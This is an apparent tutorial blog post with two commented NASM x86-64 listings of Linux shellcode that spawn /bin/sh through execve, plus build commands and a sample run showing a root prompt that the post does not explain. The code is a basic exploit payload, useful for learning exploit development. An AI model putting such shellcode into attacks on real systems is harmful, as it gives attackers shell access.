
Tuesday, March 10, 2020

shellcode in ASM to C program examples

not optimized for shortness
does not remove null (0x00) bytes

--------
using push (string built on the stack)
--------
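section .text
        global  _start

;-----------------------------------------------------------------------
; _start — Linux x86-64 (System V syscall ABI), NASM syntax, static ELF.
; Builds the NUL-terminated string "//bin/sh" on the stack and calls
;     execve("//bin/sh", NULL, NULL)
; The doubled leading slash pads the path to exactly 8 bytes so the whole
; string fits a single 64-bit immediate; consecutive slashes resolve like
; a single one.
; In:    nothing (process entry point)
; Out:   does not return on success; on failure exits with status 1
; Clobb: rax, rcx, rdi, rdx, rsi, r11, flags; 16 bytes of stack
; Note:  instruction forms are kept as the author wrote them — the
;        listing is deliberately neither size-optimised nor null-free.
;-----------------------------------------------------------------------
SYS_EXECVE      equ 59
SYS_EXIT        equ 60

_start:
        xor     rdi, rdi                ; 8 zero bytes: NUL terminator for the string
        push    rdi
        mov     rdi, 0x68732f6e69622f2f ; "//bin/sh" in little-endian byte order
        push    rdi                     ; rsp now points at "//bin/sh\0"
        mov     rdi, rsp                ; arg0: filename
        mov     rsi, 0                  ; arg1: argv = NULL (accepted by Linux; a real
                                        ;       program passes {filename, NULL})
        mov     rdx, 0                  ; arg2: envp = NULL
        mov     rax, SYS_EXECVE
        syscall                         ; only returns on failure (rax = -errno)

        ; execve failed: terminate cleanly instead of executing whatever
        ; happens to follow the end of .text.
        mov     rdi, 1                  ; exit status 1
        mov     rax, SYS_EXIT
        syscall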

--------
using data (string stored in .data)
--------
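section .data
        ; execve() requires a NUL-terminated path; the original relied on
        ; whatever bytes happened to follow the string in the section.
sh:     db      "//bin/sh", 0

section .text
        global  _start

;-----------------------------------------------------------------------
; _start — Linux x86-64 (System V syscall ABI), NASM syntax, static ELF.
; Calls execve("//bin/sh", NULL, NULL) with the path stored in .data.
; In:    nothing (process entry point)
; Out:   does not return on success; on failure exits with status 1
; Clobb: rax, rcx, rdi, rdx, rsi, r11, flags
; Note:  `mov rdi, sh` loads a 64-bit absolute address, which is fine
;        for the non-PIE executable that a plain `ld` link produces; a
;        position-independent build would use `lea rdi, [rel sh]`.
;        Instruction forms are otherwise kept as the author wrote them —
;        the listing is deliberately neither size-optimised nor null-free.
;-----------------------------------------------------------------------
SYS_EXECVE      equ 59
SYS_EXIT        equ 60

_start:
        mov     rdi, sh                 ; arg0: filename (absolute address)
        mov     rsi, 0                  ; arg1: argv = NULL (accepted by Linux; a real
                                        ;       program passes {filename, NULL})
        mov     rdx, 0                  ; arg2: envp = NULL
        mov     rax, SYS_EXECVE
        syscall                         ; only returns on failure (rax = -errno)

        ; execve failed: terminate cleanly instead of executing whatever
        ; happens to follow the end of .text.
        mov     rdi, 1                  ; exit status 1
        mov     rax, SYS_EXIT
        syscall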




------
to compile
------
$> nasm -f elf64 mycode.asm -o mycode.o
$> ld mycode.o -o mycode
$> ./mycode
# whoami
root